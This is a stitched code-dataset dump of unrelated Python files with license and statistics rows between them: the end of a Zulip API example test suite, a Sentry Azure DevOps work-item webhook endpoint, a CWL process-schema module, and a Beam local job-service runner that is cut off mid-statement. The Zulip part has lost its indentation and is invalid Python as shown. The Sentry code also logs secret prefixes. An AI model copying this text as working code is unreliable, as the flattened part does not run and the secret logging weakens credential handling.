request = {
"message_id": result["id"],
"content": "New content",
}
result = nonadmin_client.update_message(request)
validate_against_openapi_schema(result, "/messages/{message_id}", "patch", "400")
@openapi_test_function("/messages/{message_id}:delete")
def delete_message(client: Client, message_id: int) -> None:
# {code_example|start}
# Delete the message with ID "message_id"
result = client.delete_message(message_id)
# {code_example|end}
validate_against_openapi_schema(result, "/messages/{message_id}", "delete", "200")
def test_delete_message_edit_permission_error(client: Client, nonadmin_client: Client) -> None:
request = {
"type": "stream",
"to": "Denmark",
"topic": "Castle",
"content": "I come not, friends, to steal away your hearts.",
}
result = client.send_message(request)
result = nonadmin_client.delete_message(result["id"])
validate_against_openapi_schema(result, "/messages/{message_id}", "delete", "400_1")
@openapi_test_function("/messages/{message_id}/history:get")
def get_message_history(client: Client, message_id: int) -> None:
# {code_example|start}
# Get the edit history for message with ID "message_id"
result = client.get_message_history(message_id)
# {code_example|end}
validate_against_openapi_schema(result, "/messages/{message_id}/history", "get", "200")
@openapi_test_function("/realm/emoji:get")
def get_realm_emoji(client: Client) -> None:
# {code_example|start}
result = client.get_realm_emoji()
# {code_example|end}
validate_against_openapi_schema(result, "/realm/emoji", "GET", "200")
@openapi_test_function("/messages/flags:post")
def update_message_flags(client: Client) -> None:
# Send a few test messages
request: Dict[str, Any] = {
"type": "stream",
"to": "Denmark",
"topic": "Castle",
"content": "I come not, friends, to steal away your hearts.",
}
message_ids = []
for i in range(0, 3):
message_ids.append(client.send_message(request)["id"])
# {code_example|start}
# Add the "read" flag to the messages with IDs in "message_ids"
request = {
"messages": message_ids,
"op": "add",
"flag": "read",
}
result = client.update_message_flags(request)
# {code_example|end}
validate_against_openapi_schema(result, "/messages/flags", "post", "200")
# {code_example|start}
# Remove the "starred" flag from the messages with IDs in "message_ids"
request = {
"messages": message_ids,
"op": "remove",
"flag": "starred",
}
result = client.update_message_flags(request)
# {code_example|end}
validate_against_openapi_schema(result, "/messages/flags", "post", "200")
def register_queue_all_events(client: Client) -> str:
# Register the queue and get all events
# Mainly for verifying schema of /register.
result = client.register()
validate_against_openapi_schema(result, "/register", "post", "200")
return result["queue_id"]
@openapi_test_function("/register:post")
def register_queue(client: Client) -> str:
# {code_example|start}
# Register the queue
result = client.register(
event_types=["message", "realm_emoji"],
)
# {code_example|end}
validate_against_openapi_schema(result, "/register", "post", "200")
return result["queue_id"]
@openapi_test_function("/events:delete")
def deregister_queue(client: Client, queue_id: str) -> None:
# {code_example|start}
# Delete a queue (queue_id is the ID of the queue
# to be removed)
result = client.deregister(queue_id)
# {code_example|end}
validate_against_openapi_schema(result, "/events", "delete", "200")
# Test "BAD_EVENT_QUEUE_ID" error
result = client.deregister(queue_id)
validate_against_openapi_schema(result, "/events", "delete", "400")
@openapi_test_function("/server_settings:get")
def get_server_settings(client: Client) -> None:
# {code_example|start}
# Fetch the settings for this server
result = client.get_server_settings()
# {code_example|end}
validate_against_openapi_schema(result, "/server_settings", "get", "200")
@openapi_test_function("/settings/notifications:patch")
def update_notification_settings(client: Client) -> None:
# {code_example|start}
# Enable push notifications even when online
request = {
"enable_offline_push_notifications": True,
"enable_online_push_notifications": True,
}
result = client.update_notification_settings(request)
# {code_example|end}
validate_against_openapi_schema(result, "/settings/notifications", "patch", "200")
@openapi_test_function("/settings/display:patch")
def update_display_settings(client: Client) -> None:
# {code_example|start}
# Show user list on left sidebar in narrow windows.
# Change emoji set used for display to Google modern.
request = {
"left_side_userlist": True,
"emojiset": '"google"',
}
result = client.call_endpoint("settings/display", method="PATCH", request=request)
# {code_example|end}
validate_against_openapi_schema(result, "/settings/display", "patch", "200")
@openapi_test_function("/user_uploads:post")
def upload_file(client: Client) -> None:
path_to_file = os.path.join(ZULIP_DIR, "zerver", "tests", "images", "img.jpg")
# {code_example|start}
# Upload a file
with open(path_to_file, "rb") as fp:
result = client.upload_file(fp)
# Share the file by including it in a message.
client.send_message(
{
"type": "stream",
"to": "Denmark",
"topic": "Castle",
"content": "Check out [this picture]({}) of my castle!".format(result["uri"]),
}
)
# {code_example|end}
validate_against_openapi_schema(result, "/user_uploads", "post", "200")
@openapi_test_function("/users/me/{stream_id}/topics:get")
def get_stream_topics(client: Client, stream_id: int) -> None:
# {code_example|start}
result = client.get_stream_topics(stream_id)
# {code_example|end}
validate_against_openapi_schema(result, "/users/me/{stream_id}/topics", "get", "200")
@openapi_test_function("/typing:post")
def set_typing_status(client: Client) -> None:
ensure_users([10, 11], ["hamlet", "iago"])
# {code_example|start}
    # The user has started to type in the group PM with Hamlet and Iago
user_id1 = 10
user_id2 = 11
request = {
"op": "start",
"to": [user_id1, user_id2],
}
result = client.set_typing_status(request)
# {code_example|end}
validate_against_openapi_schema(result, "/typing", "post", "200")
# {code_example|start}
    # The user has finished typing in the group PM with Hamlet and Iago
user_id1 = 10
user_id2 = 11
request = {
"op": "stop",
"to": [user_id1, user_id2],
}
result = client.set_typing_status(request)
# {code_example|end}
validate_against_openapi_schema(result, "/typing", "post", "200")
# {code_example|start}
# The user has started to type in topic "typing status" of stream "Denmark"
stream_id = client.get_stream_id("Denmark")["stream_id"]
topic = "typing status"
request = {
"type": "stream",
"op": "start",
"to": [stream_id],
"topic": topic,
}
result = client.set_typing_status(request)
# {code_example|end}
validate_against_openapi_schema(result, "/typing", "post", "200")
# {code_example|start}
# The user has finished typing in topic "typing status" of stream "Denmark"
stream_id = client.get_stream_id("Denmark")["stream_id"]
topic = "typing status"
request = {
"type": "stream",
"op": "stop",
"to": [stream_id],
"topic": topic,
}
result = client.set_typing_status(request)
# {code_example|end}
validate_against_openapi_schema(result, "/typing", "post", "200")
@openapi_test_function("/realm/emoji/{emoji_name}:post")
def upload_custom_emoji(client: Client) -> None:
emoji_path = os.path.join(ZULIP_DIR, "zerver", "tests", "images", "img.jpg")
# {code_example|start}
# Upload a custom emoji; assume `emoji_path` is the path to your image.
with open(emoji_path, "rb") as fp:
emoji_name = "my_custom_emoji"
result = client.call_endpoint(
f"realm/emoji/{emoji_name}",
method="POST",
files=[fp],
)
# {code_example|end}
validate_against_openapi_schema(result, "/realm/emoji/{emoji_name}", "post", "200")
@openapi_test_function("/users/me/alert_words:get")
def get_alert_words(client: Client) -> None:
result = client.get_alert_words()
assert result["result"] == "success"
@openapi_test_function("/users/me/alert_words:post")
def add_alert_words(client: Client) -> None:
word = ["foo", "bar"]
result = client.add_alert_words(word)
assert result["result"] == "success"
@openapi_test_function("/users/me/alert_words:delete")
def remove_alert_words(client: Client) -> None:
word = ["foo"]
result = client.remove_alert_words(word)
assert result["result"] == "success"
@openapi_test_function("/user_groups/create:post")
def create_user_group(client: Client) -> None:
ensure_users([6, 7, 8, 10], ["aaron", "zoe", "cordelia", "hamlet"])
# {code_example|start}
request = {
"name": "marketing",
"description": "The marketing team.",
"members": [6, 7, 8, 10],
}
result = client.create_user_group(request)
# {code_example|end}
validate_against_openapi_schema(result, "/user_groups/create", "post", "200")
assert result["result"] == "success"
@openapi_test_function("/user_groups/{user_group_id}:patch")
def update_user_group(client: Client, user_group_id: int) -> None:
# {code_example|start}
request = {
"group_id": user_group_id,
"name": "marketing",
"description": "The marketing team.",
}
result = client.update_user_group(request)
# {code_example|end}
assert result["result"] == "success"
@openapi_test_function("/user_groups/{user_group_id}:delete")
def remove_user_group(client: Client, user_group_id: int) -> None:
# {code_example|start}
result = client.remove_user_group(user_group_id)
# {code_example|end}
validate_against_openapi_schema(result, "/user_groups/{user_group_id}", "delete", "200")
assert result["result"] == "success"
@openapi_test_function("/user_groups/{user_group_id}/members:post")
def update_user_group_members(client: Client, user_group_id: int) -> None:
ensure_users([8, 10, 11], ["cordelia", "hamlet", "iago"])
# {code_example|start}
request = {
"delete": [8, 10],
"add": [11],
}
result = client.update_user_group_members(user_group_id, request)
# {code_example|end}
validate_against_openapi_schema(result, "/user_groups/{group_id}/members", "post", "200")
def test_invalid_api_key(client_with_invalid_key: Client) -> None:
result = client_with_invalid_key.list_subscriptions()
validate_against_openapi_schema(result, "/rest-error-handling", "post", "400_0")
def test_missing_request_argument(client: Client) -> None:
result = client.render_message({})
validate_against_openapi_schema(result, "/rest-error-handling", "post", "400_1")
def test_user_account_deactivated(client: Client) -> None:
request = {
"content": "**foo**",
}
result = client.render_message(request)
validate_against_openapi_schema(result, "/rest-error-handling", "post", "403_0")
def test_realm_deactivated(client: Client) -> None:
request = {
"content": "**foo**",
}
result = client.render_message(request)
validate_against_openapi_schema(result, "/rest-error-handling", "post", "403_1")
def test_invalid_stream_error(client: Client) -> None:
result = client.get_stream_id("nonexistent")
validate_against_openapi_schema(result, "/get_stream_id", "get", "400")
# SETUP METHODS FOLLOW
def test_against_fixture(
result: Dict[str, Any],
fixture: Dict[str, Any],
check_if_equal: Optional[Iterable[str]] = None,
check_if_exists: Optional[Iterable[str]] = None,
) -> None:
assertLength(result, fixture)
if check_if_equal is None and check_if_exists is None:
for key, value in fixture.items():
assertEqual(key, result, fixture)
if check_if_equal is not None:
for key in check_if_equal:
assertEqual(key, result, fixture)
if check_if_exists is not None:
for key in check_if_exists:
assertIn(key, result)
def assertEqual(key: str, result: Dict[str, Any], fixture: Dict[str, Any]) -> None:
if result[key] != fixture[key]:
first = f"{key} = {result[key]}"
second = f"{key} = {fixture[key]}"
raise AssertionError(
"Actual and expected outputs do not match; showing diff:\n"
+ mdiff.diff_strings(first, second)
)
else:
assert result[key] == fixture[key]
def assertLength(result: Dict[str, Any], fixture: Dict[str, Any]) -> None:
if len(result) != len(fixture):
result_string = json.dumps(result, indent=4, sort_keys=True)
fixture_string = json.dumps(fixture, indent=4, sort_keys=True)
raise AssertionError(
"The lengths of the actual and expected outputs do not match; showing diff:\n"
+ mdiff.diff_strings(result_string, fixture_string)
)
else:
assert len(result) == len(fixture)
def assertIn(key: str, result: Dict[str, Any]) -> None:
if key not in result.keys():
raise AssertionError(
f"The actual output does not contain the the key `{key}`.",
)
else:
assert key in result
def test_messages(client: Client, nonadmin_client: Client) -> None:
render_message(client)
message_id = send_message(client)
add_reaction(client, message_id)
remove_reaction(client, message_id)
update_message(client, message_id)
get_raw_message(client, message_id)
get_messages(client)
check_messages_match_narrow(client)
get_message_history(client, message_id)
delete_message(client, message_id)
mark_all_as_read(client)
mark_stream_as_read(client)
mark_topic_as_read(client)
update_message_flags(client)
test_nonexistent_stream_error(client)
test_private_message_invalid_recipient(client)
test_update_message_edit_permission_error(client, nonadmin_client)
test_delete_message_edit_permission_error(client, nonadmin_client)
def test_users(client: Client, owner_client: Client) -> None:
create_user(client)
get_members(client)
get_single_user(client)
deactivate_user(client)
reactivate_user(client)
update_user(client)
get_user_by_email(client)
get_subscription_status(client)
get_profile(client)
update_notification_settings(client)
update_display_settings(client)
upload_file(client)
get_attachments(client)
set_typing_status(client)
update_presence(client)
get_user_presence(client)
create_user_group(client)
user_group_id = get_user_groups(client)
update_user_group(client, user_group_id)
update_user_group_members(client, user_group_id)
remove_user_group(client, user_group_id)
get_alert_words(client)
add_alert_words(client)
remove_alert_words(client)
deactivate_own_user(client, owner_client)
add_user_mute(client)
remove_user_mute(client)
def test_streams(client: Client, nonadmin_client: Client) -> None:
add_subscriptions(client)
test_add_subscriptions_already_subscribed(client)
list_subscriptions(client)
stream_id = get_stream_id(client)
update_stream(client, stream_id)
get_streams(client)
get_subscribers(client)
remove_subscriptions(client)
toggle_mute_topic(client)
update_subscription_settings(client)
update_notification_settings(client)
get_stream_topics(client, 1)
archive_stream(client, stream_id)
test_user_not_authorized_error(nonadmin_client)
test_authorization_errors_fatal(client, nonadmin_client)
def test_queues(client: Client) -> None:
    # Note that the example for api/get-events is not tested here.
    # Methods such as client.get_events() and client.call_on_each_message
    # are blocking calls, and the event queue backend is already thoroughly
    # tested in zerver/tests/test_event_queue.py, so it is not worth the
    # effort to come up with asynchronous logic for testing them here.
queue_id = register_queue(client)
deregister_queue(client, queue_id)
register_queue_all_events(client)
def test_server_organizations(client: Client) -> None:
get_realm_linkifiers(client)
add_realm_filter(client)
update_realm_filter(client)
add_realm_playground(client)
get_server_settings(client)
remove_realm_filter(client)
remove_realm_playground(client)
get_realm_emoji(client)
upload_custom_emoji(client)
get_realm_profile_fields(client)
reorder_realm_profile_fields(client)
create_realm_profile_field(client)
def test_errors(client: Client) -> None:
test_missing_request_argument(client)
test_invalid_stream_error(client)
def test_the_api(client: Client, nonadmin_client: Client, owner_client: Client) -> None:
get_user_agent(client)
test_users(client, owner_client)
test_streams(client, nonadmin_client)
test_messages(client, nonadmin_client)
test_queues(client)
test_server_organizations(client)
test_errors(client)
sys.stdout.flush()
if REGISTERED_TEST_FUNCTIONS != CALLED_TEST_FUNCTIONS:
print("Error! Some @openapi_test_function tests were never called:")
print(" ", REGISTERED_TEST_FUNCTIONS - CALLED_TEST_FUNCTIONS)
sys.exit(1)
| apache-2.0 | 6,032,945,492,935,285,000 | 29.945267 | 100 | 0.642058 | false |
beeftornado/sentry | src/sentry/integrations/vsts/webhooks.py | 1 | 7161 | from __future__ import absolute_import
from .client import VstsApiClient
import logging
import six
from sentry.models import (
Identity,
Integration,
OrganizationIntegration,
sync_group_assignee_inbound,
)
from sentry.models.apitoken import generate_token
from sentry.api.base import Endpoint
from django.views.decorators.csrf import csrf_exempt
from django.utils.crypto import constant_time_compare
import re
UNSET = object()
# Pull email from the string: u'lauryn <[email protected]>'
EMAIL_PARSER = re.compile(r"<(.*)>")
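# For example (the input string is illustrative):
#   EMAIL_PARSER.search("lauryn <[email protected]>").group(1) == "[email protected]"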
logger = logging.getLogger("sentry.integrations")
PROVIDER_KEY = "vsts"
class WorkItemWebhook(Endpoint):
authentication_classes = ()
permission_classes = ()
def get_client(self, identity, oauth_redirect_url):
return VstsApiClient(identity, oauth_redirect_url)
@csrf_exempt
def dispatch(self, request, *args, **kwargs):
return super(WorkItemWebhook, self).dispatch(request, *args, **kwargs)
def post(self, request, *args, **kwargs):
data = request.data
try:
event_type = data["eventType"]
external_id = data["resourceContainers"]["collection"]["id"]
except KeyError as e:
logger.info("vsts.invalid-webhook-payload", extra={"error": six.text_type(e)})
# https://docs.microsoft.com/en-us/azure/devops/service-hooks/events?view=azure-devops#workitem.updated
if event_type == "workitem.updated":
try:
integration = Integration.objects.get(
provider=PROVIDER_KEY, external_id=external_id
)
            except Integration.DoesNotExist:
                logger.info(
                    "vsts.integration-in-webhook-payload-does-not-exist",
                    extra={"external_id": external_id, "event_type": event_type},
                )
                # No matching integration; nothing to sync for this payload.
                return self.respond(status=400)
try:
self.check_webhook_secret(request, integration)
logger.info(
"vsts.valid-webhook-secret",
extra={"event_type": event_type, "integration_id": integration.id},
)
except AssertionError:
logger.info(
"vsts.invalid-webhook-secret",
extra={"event_type": event_type, "integration_id": integration.id},
)
return self.respond(status=401)
self.handle_updated_workitem(data, integration)
return self.respond()
def check_webhook_secret(self, request, integration):
try:
integration_secret = integration.metadata["subscription"]["secret"]
webhook_payload_secret = request.META["HTTP_SHARED_SECRET"]
# TODO(Steve): remove
logger.info(
"vsts.special-webhook-secret",
extra={
"integration_id": integration.id,
"integration_secret": six.text_type(integration_secret)[:6],
"webhook_payload_secret": six.text_type(webhook_payload_secret)[:6],
},
)
        except KeyError as e:
            logger.info(
                "vsts.missing-webhook-secret",
                extra={"error": six.text_type(e), "integration_id": integration.id},
            )
            # Treat a missing secret the same as a mismatched one so the
            # caller's AssertionError handler responds with a 401.
            raise AssertionError("missing webhook secret")
        assert constant_time_compare(integration_secret, webhook_payload_secret)
def handle_updated_workitem(self, data, integration):
        project = None
        try:
            external_issue_key = data["resource"]["workItemId"]
        except KeyError as e:
            logger.info(
                "vsts.updating-workitem-does-not-have-necessary-information",
                extra={"error": six.text_type(e), "integration_id": integration.id},
            )
            # Without a work item ID there is nothing to sync.
            return
        try:
            project = data["resourceContainers"]["project"]["id"]
        except KeyError as e:
            logger.info(
                "vsts.updating-workitem-does-not-have-necessary-information",
                extra={"error": six.text_type(e), "integration_id": integration.id},
            )
try:
assigned_to = data["resource"]["fields"].get("System.AssignedTo")
status_change = data["resource"]["fields"].get("System.State")
except KeyError as e:
logger.info(
"vsts.updated-workitem-fields-not-passed",
extra={
"error": six.text_type(e),
"workItemId": data["resource"]["workItemId"],
"integration_id": integration.id,
"azure_project_id": project,
},
)
return # In the case that there are no fields sent, no syncing can be done
logger.info(
"vsts.updated-workitem-fields-correct",
extra={
"workItemId": data["resource"]["workItemId"],
"integration_id": integration.id,
"azure_project_id": project,
},
)
self.handle_assign_to(integration, external_issue_key, assigned_to)
self.handle_status_change(integration, external_issue_key, status_change, project)
def handle_assign_to(self, integration, external_issue_key, assigned_to):
if not assigned_to:
return
new_value = assigned_to.get("newValue")
if new_value is not None:
try:
email = self.parse_email(new_value)
except AttributeError as e:
logger.info(
"vsts.failed-to-parse-email-in-handle-assign-to",
extra={
"error": six.text_type(e),
"integration_id": integration.id,
"assigned_to_values": assigned_to,
"external_issue_key": external_issue_key,
},
)
return # TODO(lb): return if cannot parse email?
assign = True
else:
email = None
assign = False
sync_group_assignee_inbound(
integration=integration,
email=email,
external_issue_key=external_issue_key,
assign=assign,
)
def handle_status_change(self, integration, external_issue_key, status_change, project):
if status_change is None:
return
organization_ids = OrganizationIntegration.objects.filter(
integration_id=integration.id
).values_list("organization_id", flat=True)
for organization_id in organization_ids:
installation = integration.get_installation(organization_id)
data = {
"new_state": status_change["newValue"],
# old_state is None when the issue is New
"old_state": status_change.get("oldValue"),
"project": project,
}
installation.sync_status_inbound(external_issue_key, data)
def parse_email(self, email):
# TODO(lb): hmm... this looks brittle to me
return EMAIL_PARSER.search(email).group(1)
def create_subscription(self, instance, identity_data, oauth_redirect_url):
client = self.get_client(Identity(data=identity_data), oauth_redirect_url)
shared_secret = generate_token()
return client.create_subscription(instance, shared_secret), shared_secret
| bsd-3-clause | -2,832,467,956,054,932,500 | 37.294118 | 111 | 0.569055 | false |
foreveremain/common-workflow-language | reference/cwltool/process.py | 1 | 3893 | import avro.schema
import os
import json
import avro_ld.validate as validate
import copy
import yaml
import logging
import pprint
from aslist import aslist
import avro_ld.schema
import urlparse
from pkg_resources import resource_stream
_logger = logging.getLogger("cwltool")
class WorkflowException(Exception):
pass
def get_schema():
f = resource_stream(__name__, 'schemas/draft-2/cwl-avro.yml')
j = yaml.load(f)
return (j, avro_ld.schema.schema(j))
def get_feature(self, feature):
for t in reversed(self.requirements):
if t["class"] == feature:
return (t, True)
for t in reversed(self.hints):
if t["class"] == feature:
return (t, False)
return (None, None)
class Process(object):
def __init__(self, toolpath_object, validateAs, do_validate=True, **kwargs):
(_, self.names) = get_schema()
self.tool = toolpath_object
if do_validate:
try:
                # Validate tool document
validate.validate_ex(self.names.get_name(validateAs, ""), self.tool, strict=kwargs.get("strict"))
except validate.ValidationException as v:
raise validate.ValidationException("Could not validate %s as %s:\n%s" % (self.tool.get("id"), validateAs, validate.indent(str(v))))
self.requirements = kwargs.get("requirements", []) + self.tool.get("requirements", [])
self.hints = kwargs.get("hints", []) + self.tool.get("hints", [])
self.validate_hints(self.tool.get("hints", []), strict=kwargs.get("strict"))
self.schemaDefs = {}
sd, _ = self.get_requirement("SchemaDefRequirement")
if sd:
for i in sd["types"]:
avro.schema.make_avsc_object(i, self.names)
self.schemaDefs[i["name"]] = i
# Build record schema from inputs
self.inputs_record_schema = {"name": "input_record_schema", "type": "record", "fields": []}
for i in self.tool["inputs"]:
c = copy.copy(i)
doc_url, fragment = urlparse.urldefrag(c['id'])
c["name"] = fragment
del c["id"]
if "type" not in c:
raise validate.ValidationException("Missing `type` in parameter `%s`" % c["name"])
if "default" in c:
c["type"] = ["null"] + aslist(c["type"])
else:
c["type"] = c["type"]
self.inputs_record_schema["fields"].append(c)
avro.schema.make_avsc_object(self.inputs_record_schema, self.names)
self.outputs_record_schema = {"name": "outputs_record_schema", "type": "record", "fields": []}
for i in self.tool["outputs"]:
c = copy.copy(i)
doc_url, fragment = urlparse.urldefrag(c['id'])
c["name"] = fragment
del c["id"]
if "type" not in c:
raise validate.ValidationException("Missing `type` in parameter `%s`" % c["name"])
if "default" in c:
c["type"] = ["null"] + aslist(c["type"])
else:
c["type"] = c["type"]
self.outputs_record_schema["fields"].append(c)
avro.schema.make_avsc_object(self.outputs_record_schema, self.names)
def validate_hints(self, hints, strict):
for r in hints:
try:
if self.names.get_name(r["class"], "") is not None:
validate.validate_ex(self.names.get_name(r["class"], ""), r, strict=strict)
else:
_logger.info(validate.ValidationException("Unknown hint %s" % (r["class"])))
except validate.ValidationException as v:
raise validate.ValidationException("Validating hint `%s`: %s" % (r["class"], str(v)))
def get_requirement(self, feature):
return get_feature(self, feature)
| apache-2.0 | -9,149,455,562,665,673,000 | 34.715596 | 147 | 0.571025 | false |
staslev/incubator-beam | sdks/python/apache_beam/runners/portability/universal_local_runner.py | 4 | 14119 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import functools
import logging
import os
import Queue as queue
import socket
import subprocess
import sys
import threading
import time
import traceback
import uuid
from concurrent import futures
import grpc
from google.protobuf import text_format
from apache_beam.portability.api import beam_job_api_pb2
from apache_beam.portability.api import beam_job_api_pb2_grpc
from apache_beam.portability.api import endpoints_pb2
from apache_beam.runners import runner
from apache_beam.runners.portability import fn_api_runner
TERMINAL_STATES = [
beam_job_api_pb2.JobState.DONE,
beam_job_api_pb2.JobState.STOPPED,
beam_job_api_pb2.JobState.FAILED,
beam_job_api_pb2.JobState.CANCELLED,
]
class UniversalLocalRunner(runner.PipelineRunner):
"""A BeamRunner that executes Python pipelines via the Beam Job API.
By default, this runner executes in process but still uses GRPC to communicate
pipeline and worker state. It can also be configured to use inline calls
rather than GRPC (for speed) or launch completely separate subprocesses for
the runner and worker(s).
"""
def __init__(self, use_grpc=True, use_subprocesses=False):
if use_subprocesses and not use_grpc:
raise ValueError("GRPC must be used with subprocesses")
super(UniversalLocalRunner, self).__init__()
self._use_grpc = use_grpc
self._use_subprocesses = use_subprocesses
self._job_service = None
self._job_service_lock = threading.Lock()
self._subprocess = None
def __del__(self):
# Best effort to not leave any dangling processes around.
self.cleanup()
def cleanup(self):
if self._subprocess:
self._subprocess.kill()
time.sleep(0.1)
self._subprocess = None
def _get_job_service(self):
with self._job_service_lock:
if not self._job_service:
if self._use_subprocesses:
self._job_service = self._start_local_runner_subprocess_job_service()
elif self._use_grpc:
self._servicer = JobServicer(use_grpc=True)
self._job_service = beam_job_api_pb2_grpc.JobServiceStub(
grpc.insecure_channel(
'localhost:%d' % self._servicer.start_grpc()))
else:
self._job_service = JobServicer(use_grpc=False)
return self._job_service
def _start_local_runner_subprocess_job_service(self):
if self._subprocess:
# Kill the old one if it exists.
self._subprocess.kill()
# TODO(robertwb): Consider letting the subprocess pick one and
# communicate it back...
port = _pick_unused_port()
logging.info("Starting server on port %d.", port)
self._subprocess = subprocess.Popen([
sys.executable,
'-m',
'apache_beam.runners.portability.universal_local_runner_main',
'-p',
str(port),
'--worker_command_line',
'%s -m apache_beam.runners.worker.sdk_worker_main' % sys.executable
])
job_service = beam_job_api_pb2_grpc.JobServiceStub(
grpc.insecure_channel('localhost:%d' % port))
logging.info("Waiting for server to be ready...")
start = time.time()
timeout = 30
while True:
time.sleep(0.1)
if self._subprocess.poll() is not None:
raise RuntimeError(
"Subprocess terminated unexpectedly with exit code %d." %
self._subprocess.returncode)
elif time.time() - start > timeout:
raise RuntimeError(
"Pipeline timed out waiting for job service subprocess.")
else:
try:
job_service.GetState(
beam_job_api_pb2.GetJobStateRequest(job_id='[fake]'))
break
except grpc.RpcError as exn:
          if exn.code() != grpc.StatusCode.UNAVAILABLE:
# We were able to contact the service for our fake state request.
break
logging.info("Server ready.")
return job_service
def run(self, pipeline):
job_service = self._get_job_service()
prepare_response = job_service.Prepare(
beam_job_api_pb2.PrepareJobRequest(
job_name='job',
pipeline=pipeline.to_runner_api()))
run_response = job_service.Run(beam_job_api_pb2.RunJobRequest(
preparation_id=prepare_response.preparation_id))
return PipelineResult(job_service, run_response.job_id)
class PipelineResult(runner.PipelineResult):
def __init__(self, job_service, job_id):
super(PipelineResult, self).__init__(beam_job_api_pb2.JobState.UNSPECIFIED)
self._job_service = job_service
self._job_id = job_id
self._messages = []
def cancel(self):
    self._job_service.Cancel(
        beam_job_api_pb2.CancelJobRequest(job_id=self._job_id))
@property
def state(self):
runner_api_state = self._job_service.GetState(
beam_job_api_pb2.GetJobStateRequest(job_id=self._job_id)).state
self._state = self._runner_api_state_to_pipeline_state(runner_api_state)
return self._state
@staticmethod
def _runner_api_state_to_pipeline_state(runner_api_state):
return getattr(
runner.PipelineState,
beam_job_api_pb2.JobState.Enum.Name(runner_api_state))
@staticmethod
def _pipeline_state_to_runner_api_state(pipeline_state):
return beam_job_api_pb2.JobState.Enum.Value(pipeline_state)
def wait_until_finish(self):
def read_messages():
for message in self._job_service.GetMessageStream(
beam_job_api_pb2.JobMessagesRequest(job_id=self._job_id)):
self._messages.append(message)
threading.Thread(target=read_messages).start()
for state_response in self._job_service.GetStateStream(
beam_job_api_pb2.GetJobStateRequest(job_id=self._job_id)):
self._state = self._runner_api_state_to_pipeline_state(
state_response.state)
if state_response.state in TERMINAL_STATES:
break
if self._state != runner.PipelineState.DONE:
raise RuntimeError(
"Pipeline %s failed in state %s." % (self._job_id, self._state))
class BeamJob(threading.Thread):
"""This class handles running and managing a single pipeline.
The current state of the pipeline is available as self.state.
"""
def __init__(self, job_id, pipeline_options, pipeline_proto,
use_grpc=True, sdk_harness_factory=None):
super(BeamJob, self).__init__()
self._job_id = job_id
self._pipeline_options = pipeline_options
self._pipeline_proto = pipeline_proto
self._use_grpc = use_grpc
self._sdk_harness_factory = sdk_harness_factory
self._log_queue = queue.Queue()
self._state_change_callbacks = [
lambda new_state: self._log_queue.put(
beam_job_api_pb2.JobMessagesResponse(
state_response=
beam_job_api_pb2.GetJobStateResponse(state=new_state)))
]
self._state = None
self.state = beam_job_api_pb2.JobState.STARTING
self.daemon = True
def add_state_change_callback(self, f):
self._state_change_callbacks.append(f)
@property
def log_queue(self):
return self._log_queue
@property
def state(self):
return self._state
@state.setter
def state(self, new_state):
for state_change_callback in self._state_change_callbacks:
state_change_callback(new_state)
self._state = new_state
def run(self):
with JobLogHandler(self._log_queue):
try:
fn_api_runner.FnApiRunner(
use_grpc=self._use_grpc,
sdk_harness_factory=self._sdk_harness_factory
).run_via_runner_api(self._pipeline_proto)
self.state = beam_job_api_pb2.JobState.DONE
except: # pylint: disable=bare-except
logging.exception("Error running pipeline.")
traceback.print_exc()
self.state = beam_job_api_pb2.JobState.FAILED
def cancel(self):
if self.state not in TERMINAL_STATES:
self.state = beam_job_api_pb2.JobState.CANCELLING
# TODO(robertwb): Actually cancel...
self.state = beam_job_api_pb2.JobState.CANCELLED
class JobServicer(beam_job_api_pb2_grpc.JobServiceServicer):
"""Servicer for the Beam Job API.
Manages one or more pipelines, possibly concurrently.
"""
def __init__(
self, worker_command_line=None, use_grpc=True):
self._worker_command_line = worker_command_line
self._use_grpc = use_grpc or bool(worker_command_line)
self._jobs = {}
def start_grpc(self, port=0):
self._server = grpc.server(futures.ThreadPoolExecutor(max_workers=3))
port = self._server.add_insecure_port('localhost:%d' % port)
beam_job_api_pb2_grpc.add_JobServiceServicer_to_server(self, self._server)
self._server.start()
return port
def Prepare(self, request, context=None):
# For now, just use the job name as the job id.
preparation_id = "%s-%s" % (request.job_name, uuid.uuid4())
if self._worker_command_line:
sdk_harness_factory = functools.partial(
SubprocessSdkWorker, self._worker_command_line)
else:
sdk_harness_factory = None
self._jobs[preparation_id] = BeamJob(
preparation_id, request.pipeline_options, request.pipeline,
use_grpc=self._use_grpc, sdk_harness_factory=sdk_harness_factory)
return beam_job_api_pb2.PrepareJobResponse(preparation_id=preparation_id)
def Run(self, request, context=None):
job_id = request.preparation_id
self._jobs[job_id].start()
return beam_job_api_pb2.RunJobResponse(job_id=job_id)
def GetState(self, request, context=None):
return beam_job_api_pb2.GetJobStateResponse(
state=self._jobs[request.job_id].state)
def Cancel(self, request, context=None):
self._jobs[request.job_id].cancel()
    return beam_job_api_pb2.CancelJobResponse(
state=self._jobs[request.job_id].state)
def GetStateStream(self, request, context=None):
job = self._jobs[request.job_id]
state_queue = queue.Queue()
job.add_state_change_callback(lambda state: state_queue.put(state))
try:
      current_state = state_queue.get(block=False)
except queue.Empty:
current_state = job.state
yield beam_job_api_pb2.GetJobStateResponse(
state=current_state)
while current_state not in TERMINAL_STATES:
current_state = state_queue.get(block=True)
yield beam_job_api_pb2.GetJobStateResponse(
state=current_state)
def GetMessageStream(self, request, context=None):
job = self._jobs[request.job_id]
current_state = job.state
while current_state not in TERMINAL_STATES:
msg = job.log_queue.get(block=True)
yield msg
if msg.HasField('state_response'):
current_state = msg.state_response.state
try:
while True:
yield job.log_queue.get(block=False)
except queue.Empty:
pass
class SubprocessSdkWorker(object):
"""Manages a SDK worker implemented as a subprocess communicating over grpc.
"""
def __init__(self, worker_command_line, control_address):
self._worker_command_line = worker_command_line
self._control_address = control_address
def run(self):
control_descriptor = text_format.MessageToString(
endpoints_pb2.ApiServiceDescriptor(url=self._control_address))
p = subprocess.Popen(
self._worker_command_line,
shell=True,
env=dict(os.environ,
CONTROL_API_SERVICE_DESCRIPTOR=control_descriptor))
try:
p.wait()
if p.returncode:
raise RuntimeError(
